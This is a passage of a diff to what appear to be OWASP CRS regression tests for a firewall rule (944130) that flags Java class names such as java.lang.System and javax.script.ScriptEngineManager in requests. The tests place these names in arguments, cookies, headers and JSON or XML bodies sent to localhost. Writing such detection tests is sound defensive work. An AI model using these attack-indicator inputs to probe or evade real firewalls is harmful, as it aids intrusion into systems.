"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.StringBuilder" + output: + log_contains: "id \"944130\"" + - test_id: 373 desc: "Content-Type application/json arg value includes keyword java.lang.StringBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.StringBuilder\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-374 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.StringBuilder\"}" + output: + log_contains: "id \"944130\"" + - test_id: 374 desc: "Content-Type application/json arg name includes keyword java.lang.StringBuilder" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.lang.StringBuilder\": \"test\"}" 
- output: - log_contains: "id \"944130\"" - - test_title: 944130-375 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.lang.StringBuilder\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_id: 375 desc: "Argument test includes keyword java.lang.System" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.System" - output: - log_contains: "id \"944130\"" - - test_title: 944130-376 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.System" + output: + log_contains: "id \"944130\"" + - test_id: 376 desc: "Argument name includes keyword java.lang.System" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: 
"en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.System=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-377 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.System=test" + output: + log_contains: "id \"944130\"" + - test_id: 377 desc: "Cookie test includes keyword java.lang.System" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.System - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-378 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.System + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 378 desc: "Cookie name includes keyword java.lang.System" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP 
CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.System=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-379 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.System=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 379 desc: "Request header test includes keyword java.lang.System" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.System - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-380 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.System + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + 
log_contains: "id \"944130\"" + - test_id: 380 desc: "XML attribute value includes keyword java.lang.System" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-381 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 381 desc: "XML element value includes keyword java.lang.System" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.System" - output: - log_contains: "id \"944130\"" - - test_title: 944130-382 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + 
version: "HTTP/1.0" + data: "java.lang.System" + output: + log_contains: "id \"944130\"" + - test_id: 382 desc: "Nested XML element value includes keyword java.lang.System" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.System" - output: - log_contains: "id \"944130\"" - - test_title: 944130-383 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.System" + output: + log_contains: "id \"944130\"" + - test_id: 383 desc: "Content-Type text/plain includes keyword java.lang.System" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.System" - output: - log_contains: "id \"944130\"" - - test_title: 944130-384 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: 
"en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.System" + output: + log_contains: "id \"944130\"" + - test_id: 384 desc: "Content-Type application/json arg value includes keyword java.lang.System" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.System\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-385 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.System\"}" + output: + log_contains: "id \"944130\"" + - test_id: 385 desc: "Content-Type application/json arg name includes keyword java.lang.System" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.lang.System\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-386 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.lang.System\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_id: 386 desc: "Argument test includes keyword javax.script.ScriptEngineManager" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=javax.script.ScriptEngineManager" - output: - log_contains: "id \"944130\"" - - test_title: 944130-387 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=javax.script.ScriptEngineManager" + output: + log_contains: "id \"944130\"" + - test_id: 387 desc: "Argument name includes keyword javax.script.ScriptEngineManager" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: 
"javax.script.ScriptEngineManager=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-388 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "javax.script.ScriptEngineManager=test" + output: + log_contains: "id \"944130\"" + - test_id: 388 desc: "Cookie test includes keyword javax.script.ScriptEngineManager" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=javax.script.ScriptEngineManager - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-389 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=javax.script.ScriptEngineManager + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 389 desc: "Cookie name includes keyword javax.script.ScriptEngineManager" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: javax.script.ScriptEngineManager=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-390 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: javax.script.ScriptEngineManager=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 390 desc: "Request header test includes keyword javax.script.ScriptEngineManager" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: javax.script.ScriptEngineManager - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-391 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: javax.script.ScriptEngineManager + method: "POST" + uri: "/post" + 
version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 391 desc: "XML attribute value includes keyword javax.script.ScriptEngineManager" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-392 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 392 desc: "XML element value includes keyword javax.script.ScriptEngineManager" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "javax.script.ScriptEngineManager" - output: - log_contains: "id \"944130\"" - - test_title: 944130-393 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + 
Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "javax.script.ScriptEngineManager" + output: + log_contains: "id \"944130\"" + - test_id: 393 desc: "Nested XML element value includes keyword javax.script.ScriptEngineManager" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "javax.script.ScriptEngineManager" - output: - log_contains: "id \"944130\"" - - test_title: 944130-394 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "javax.script.ScriptEngineManager" + output: + log_contains: "id \"944130\"" + - test_id: 394 desc: "Content-Type text/plain includes keyword javax.script.ScriptEngineManager" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=javax.script.ScriptEngineManager" - output: - log_contains: "id \"944130\"" - - test_title: 944130-395 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: 
"OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=javax.script.ScriptEngineManager" + output: + log_contains: "id \"944130\"" + - test_id: 395 desc: "Content-Type application/json arg value includes keyword javax.script.ScriptEngineManager" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"javax.script.ScriptEngineManager\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-396 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"javax.script.ScriptEngineManager\"}" + output: + log_contains: "id \"944130\"" + - test_id: 396 desc: "Content-Type application/json arg name includes keyword javax.script.ScriptEngineManager" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: 
"/post" - version: "HTTP/1.0" - data: "{\"javax.script.ScriptEngineManager\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-397 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"javax.script.ScriptEngineManager\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_id: 397 desc: "Argument test includes keyword org.apache.commons" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=org.apache.commons" - output: - log_contains: "id \"944130\"" - - test_title: 944130-398 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=org.apache.commons" + output: + log_contains: "id \"944130\"" + - test_id: 398 desc: "Argument name includes keyword org.apache.commons" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "org.apache.commons=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-399 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "org.apache.commons=test" + output: + log_contains: "id \"944130\"" + - test_id: 399 desc: "Cookie test includes keyword org.apache.commons" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=org.apache.commons - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-400 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=org.apache.commons + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 400 desc: 
